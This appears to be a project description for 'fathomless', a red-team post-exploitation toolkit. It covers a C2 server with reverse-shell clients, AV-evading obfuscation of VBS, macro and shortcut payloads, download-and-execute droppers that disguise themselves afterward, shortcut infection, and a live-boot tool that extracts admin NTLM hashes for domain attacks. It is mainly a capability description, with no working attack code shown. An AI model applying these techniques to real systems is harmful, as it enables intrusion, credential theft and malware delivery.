fathomless: post-exploitation tools for network red teaming


A collection of tools personalized for red teams but also useful for pen testers.

  • Modified Linux distro that is effective on Win 7 partitions and pre UEFI Systems.
  • Custom HTTPS capable C2 server uses a cgi written in Perl and reverse shell clients written in Powershell / Python.
  • Simple Windows script obfuscator for AV evasion uses a polyalphabetic cipher to alter b64 encoding.


This is an upgrade of sorts to the async-shell-handler.


asynchronous multi-shell handler

Includes a server-side cgi application and a powershell client. It performs handling of systems that have executed the async-client script. This allows the individual running the server hosting the cgi to enter shell commands to be executed by clients asynchronously.

The information is exchanged in an encoded format, the secure nature directly relies upon the use of SSL/TLS.


Generate Obfuscated Code

This is a simple perl program that generates obfuscated vbs/vba code for use in passing a command to cmd /c while bypassing AV.

To set the options you will need to edit the .pl file directly this is not just a simple program with preset payloads. It’s designed to take in any type of one-liner you can think of passing to “cmd.exe /c”.

Made to be used along with the async-client powershell script, but any one-liner that get’s you a shell should work.

Generated Output of an obfuscated command string:

generated output

The hash value of the resulting code with the same command string will alter upon each run.

generated hash


The result of porting some functionality from gen-obfuscated into the powershell clients. Made to run from a windows systems to generate payloads without needing to use the powershell clients/implants.These are those functions, plus some original content in a stand alone version that can be run from windows to generate payloads to get initial access.

The obfuscation engine is ported but the only supported methods currently are vbscript, vba macros and lnk files along with other obfuscation techniques.

This is not complete and the under utilized functions will be expanded upon, or you can do you own thing and not have to wait.

Available functions.

simple-downloader “Url-hosting-script”

Generates an obfuscated vbs script that will download and execute a powershell script. After execution it rewrites itself into a txt file with bogus info and opens in notepad.

looping-stager “Url-hosting-script”

Generates a command string for use kicks of a looping downloader.

gen-shorcut “Url-hosting-script”

Creates a shortcut that downloads and executes the script found in the provided url.

shortcut-infect “name-of-lnk” “Url-hosting-script”

Modifies the specified existing shortcut to run the original program and also execute a download and execute command string.

obfuscate “name of text file / script”

Uses a polyalphabetic obfuscation method on base64 strings writes obfuscated string to file and provides a de-obfuscation key.

de-obfuscate “name of text file / script” “key”

Performs the inverse of the obfuscation function requires the text file with the obfuscated base64 data and de-obfuscation key as parameters.


generates a random alphabetic string for use with the obfuscate-base64 function.

obfuscate-base64 “(action:hide or clear ), (key: obfuscation or de-ofuscation), (base64-string)”

The function that contains the obfuscation engine, it works only with clear base64 data. It’s UTF8 so do not use this for powershell encoded commands.

byte-encode “binary-to-obfuscate” “key”

Performs byte-encoding prior to converting to obfuscated base64 provide key de-obfuscation.

byte-decode “file-containing-obfu-base64” “key”

performs the reverse of byte-encode, requires the de-obfuscation key.

gen-enccmd “your command string”

Generates a PowerShell formatted encoded command. Insure to quote your command string.

example: gen-enccmd “cmd /c ipconfig /all”

dec-enccmd “Your encoded command string”

Decodes the base64 string and displays the original string.

IMPORTANT !!! Be sure to dot source this script or iex to import these function into your current powershell session for this to work.

The boot2own toolkit

B2O is a toolkit that generates a live OS from a CrunchBang iso. When a workstation is booted to this live environment it’s hard to drive is mounted and the NTLM hash of the local admin (RID 500) is extracted. The admin hash is then leveraged in attacks against a Windows domain network using a patched winexe binary.

Used crunchbang-11-20130506-i686.iso successfully to generate liveCD.

Used Ubuntu Server x86 12.04 successfully to compile patched winexe So use Ubuntu Server/Desktop x86 12.04 to compile binary for i686 crunchbang iso.

Confirmed working on Windows 7 only.

Download & Usage

Source: https://github.com/xor-function/